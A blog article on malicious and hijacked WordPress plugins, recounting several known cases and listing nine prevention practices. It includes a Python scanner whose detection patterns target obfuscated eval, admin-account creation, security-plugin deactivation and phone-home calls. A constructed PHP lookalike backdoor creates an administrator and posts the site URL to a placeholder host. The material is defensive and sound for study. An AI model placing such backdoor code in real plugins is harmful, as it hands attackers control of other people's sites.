If you've ever built a WordPress website, you know that plugins offer many advantages that help you build it faster and with much more ease. The only problem, and it's not a small one, is that there are many plugins out there that can harm your website and compromise your security in a major way, especially if you're not keeping a vigilant eye on them.
It's widely known that a new tactic among some SEO'ers is to inject spam keywords and anchor text into unsuspecting websites through backdoors in popular plugins. This tactic goes back to 2013, and it links the perpetrator to half a dozen other payday loan spam injections into WordPress plugins.
James Lewis, a Senior Business Analyst with Simple Payday, a payday loan lender in the UK, monitors his sites' performance and has noticed these spammers over the years.
“In the field of emergency loan lenders and brokers, there is enormous competition to be the number one result in the search engines. This need to get to number one has seen some websites, over the years, resort to tactics that aren’t too far away from criminal activity.”
Here's a fact: upwards of 54% of all vulnerabilities detected on WordPress websites are associated with a plugin, making plugins the #1 cause of security breaches. Now, truth be told, many of these breaches can be traced back to user error, like when a plugin isn't updated on time. However, in some circumstances (which are growing in number all the time) the security issue has nothing to do with the user and everything to do with the hacker who injected malicious code into the plugin you downloaded.
In short, a fake plugin with the hostile intent of corrupting your website so that it can be hacked. Even worse, these fake plugins can be awfully difficult to spot, until the search results for your dog grooming website are littered with payday loan terms.
Tricked by a Plugin? Don't Feel Too Bad, So Was Everyone Else
When creating a WordPress website, every angle of attack by hackers needs to be locked down tight, especially when it involves direct visitor contact. That includes the admin area, of course, as well as your site's root directory. The problem with plugins, however, is that if you don't spot a fake before you install it, you're left with the unenviable task of trying to get rid of it from the inside rather than blocking it from the outside.
The truth is, the hackers who are creating these malicious plugins for WordPress know exactly what they're doing, and know exactly how to create code that passes the WordPress security scanners as legitimate (at least for a short time). Add to that the fact that some fake plugins started life as real plugins and you can see how difficult the problem of detecting them becomes.
Never seen or experienced a fake WordPress plugin? Before we go further and tell you how to avoid them, let's take a look at some infamous cases.
The Pingatorpin Plugin from 2013
In 2013 Sucuri, the website security company, came across dozens of websites that all shared the same set of files, all of which contained malware that was causing spam to run rampant on those sites. At the root of the problem was the Pingatorpin plugin, which even a web security company like Sucuri didn't detect until they started some heavy-duty digging.
The SI CAPTCHA Anti-Spam Plugin from 2017
A fake plugin that started life as a real one, the SI CAPTCHA Anti-Spam plugin was a valid CAPTCHA plugin until it was purchased by another company. Once it was, the new owner secretly added code that, when activated, connected to a different server, and that server then injected payday loan ads into the blog posts of all the WordPress users who had the plugin. Even worse, this same scamming SOB created 8 more fake plugins that, among other things, gave them backdoor access to websites where they would run even more spam.
Fact is, the best (i.e. worst) hackers know they can do this, so they purchase the most well-known plugins for themselves and, once they have them, issue a plugin update with malicious code baked in. Crafty as they are, hackers know that the WordPress community is hyper-vigilant, and will rarely use a little-known plugin, so they buy one that's popular and has the highest chance of getting through unnoticed. Now that's devious.
The WP-BASE-SEO Plugin from 2017
In April of 2017 the WP-BASE-SEO plugin was released and, once installed, nearly 4000 WordPress websites were immediately breached. What was different about the WP-BASE-SEO plugin, however, was that it wasn't built from scratch and it wasn't an established and popular plugin either. No, in this case the hacker copied the code from another plugin and used that code to get through the initial security scans. Luckily their plans were thwarted rather quickly when base64-encoded PHP and some suspicious files were identified as the culprits.
The X-WP-SPAM-SHIELD-PRO Plugin
One of the most recent cases of fake plugins involving WordPress websites was the now infamous X-WP-SPAM-SHIELD-PRO plugin debacle. At first this plugin appeared to be well-coded and secure, with folders structured similarly to safe, normal WordPress plugins. After several well-known websites were infected, however, Sucuri encountered major code issues that, frankly, are quite terrifying.
The X-WP-SPAM-SHIELD-PRO plugin, once installed, went directly after all of the most vital website information, including:
- A list of all installed plugins
- The current version of WordPress being used
- The names of all users who were logged in, including sensitive material like passwords and IP addresses
- The complete list of all the website's administrators
Once it had accomplished this first half of its mission, this rogue plugin had the power to do some incredibly damaging things to the website it infected:
- Add a new user admin, giving that person the ability to roam at will
- Deactivate security and other plugins
- Upload any type of file it wanted to the infected website
- Get an instant notification when the plugin was installed, to be able to start tearing it down immediately.
If you do anything with WordPress websites that knowledge should scare the bejeezus out of you, so let's stop looking at what might happen and start focusing on ways to make sure it doesn't happen.
Best WordPress Practices to Prevent Hackers from Raiding Your Website
Below are 9 of the best ways to prevent your website from being hacked (and help you sleep better at night). Read them, use them and come back to them for a refresher from time to time.
1- Perform a Quality Control Review
No matter where you find a plugin you wish to use, check it out extensively first using the checklist below.
- Check the reputation of the developer.
- Check the frequency of updates. Fakes will go for long periods without them and, even if they're not fake, they may be simply abandoned.
- Check how many users there are. The more, the better.
- Check the plugin's score. Lower than 4.5 usually means 'stay away'.
- Check any notes left by devs. If security is mentioned at all, give that plugin a 'no'.
It goes without saying that if you discover a plugin you want outside of normal WordPress channels, do your due diligence and research it thoroughly before installation.
2- Thoroughly Review all the code
Inspecting the file structure of a new (to you) plugin should be your first task. If it looks good, go deeper and look at the file coding. Any requests for sensitive information are a definite red flag.
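As an added example (not code from the original article, nor from Sucuri or WordPress), here is a small Python scanner for the source-level patterns behind the behaviours described above: base64-obfuscated PHP like the WP-BASE-SEO case, and the admin-creation, plugin-deactivation, file-writing and phone-home behaviours of the rogue plugin. The indicator names, weights and thresholds are this example's own assumptions, and the two plugin sources are constructed samples.

```python
import re

# Indicators to look for when reading a plugin's source, drawn from the behaviours
# this article describes. The names, patterns and weights are this example's own
# choices (assumptions), not a WordPress or Sucuri rule set.
INDICATORS = {
    "obfuscated_code":  (re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\("), 5),
    "base64_blob":      (re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{40,}"), 4),
    "grants_admin":     (re.compile(r"\b(set_role|add_role)\s*\(\s*['\"]administrator['\"]"), 4),
    "creates_user":     (re.compile(r"\b(wp_create_user|wp_insert_user)\s*\("), 3),
    "disables_plugins": (re.compile(r"\bdeactivate_plugins\s*\("), 3),
    "writes_files":     (re.compile(r"\b(move_uploaded_file|file_put_contents)\s*\("), 2),
    "phones_home":      (re.compile(r"\b(wp_remote_(get|post)|curl_exec)\s*\("), 1),
    "activation_hook":  (re.compile(r"\bregister_activation_hook\s*\("), 1),
}

def scan_plugin_source(src: str) -> dict:
    """Map each indicator found in the PHP source to the first line it appears on."""
    hits = {}
    for lineno, line in enumerate(src.splitlines(), 1):
        for name, (pattern, _weight) in INDICATORS.items():
            if name not in hits and pattern.search(line):
                hits[name] = lineno
    return hits

def verdict(src: str) -> str:
    """Sum indicator weights: one wp_remote_get is normal, a cluster of hits is not."""
    score = sum(INDICATORS[name][1] for name in scan_plugin_source(src))
    return "reject" if score >= 8 else "review" if score >= 3 else "ok"

# Constructed samples: an ordinary shortcode plugin and a lookalike of the rogue
# plugin described above (placeholder base64 text, not a real payload).
BENIGN_SAMPLE = """<?php
/* Plugin Name: Example Contact Form (constructed sample) */
add_action('init', 'ecf_init');
function ecf_init() { add_shortcode('ecf', 'ecf_render'); }
function ecf_render($atts) { return '<form>...</form>'; }
"""
ROGUE_SAMPLE = """<?php
/* Plugin Name: X Spam Shield Pro (constructed lookalike sample) */
register_activation_hook(__FILE__, 'xsp_activate');
function xsp_activate() {
    $id = wp_create_user('support', 'pw', 'x@example.invalid');
    (new WP_User($id))->set_role('administrator');
    deactivate_plugins(array('wordfence/wordfence.php'));
    wp_remote_post('http://example.invalid/ping', array('body' => home_url()));
}
eval(base64_decode('QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5QUJDREVG'));
"""
```

Run `scan_plugin_source` over every `.php` file in an unpacked plugin before activating it; anything scoring "review" deserves a line-by-line read of the flagged lines rather than an automatic pass.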
3- Review the Plugins Bundled in Your Theme
Many WordPress themes come with plugins already bundled and, if they happen to be the infamous TimThumb, Gravity Forms or Slider Revolution plugins, you might be headed for trouble. These plugins slipped through the security cracks because they were already installed. So be sure to check your theme occasionally and make sure there aren't any gremlins hiding in there.
4- Use a Well-known Security Plugin
It goes without saying that a security plugin is a vital tool that can protect your website and let you know when another plugin has been either flagged or removed.
5- Get a Vulnerability Scanner
Although it might not catch a fake plugin per se, a good vulnerability scanner can alert you to spam, infections and malware, so it's a good choice to have one and use it.
6- Manage Your Plugins Like You Would Any Other Aspect of your Website
Many website owners look at plugins as a 'one-and-done' type of situation, but that is definitely not the case. Every plugin you're using should be:
- Kept up-to-date
- Deleted if it's old or you're not using it
- Immediately removed if it's proven fake or has serious security issues. (SiteLock can give you a list of the offending plugins.)
7- After Installing a Plugin, Review Your Entire Website
Just like when installing anything new onto your WordPress site, checking your website 'live' after you've installed a new plugin is a very good habit.
8- Take Advantage of the WPScan Vulnerability Database
Made to track vulnerabilities in WordPress plugins and themes, this online database keeps a running list of them that you can check any time you like. Best practice is to subscribe to their alerts so that you get notified whenever another one is added to the list.
9- Download and Use Plugins From Only The Best Sources
It goes without saying that you should only get your plugins from the best sources. Pressed for time? All the plugins you'd likely need for a high-performance WordPress site can be found on WPMU DEV.
In Conclusion, Simply Be Vigilant
WordPress plugins make our online lives much easier, no doubt, even if they come with an inherent risk. Reducing that risk takes vigilance, it's true, but if you follow the nine best practices above and monitor your plugins regularly, you'll get the excellent benefits plugins deliver without all the headaches of payday loan anchor text and ads on your website about 1950's trains. Just what you don't need when you're trying to locate a 1958 Super Chief Streamliner.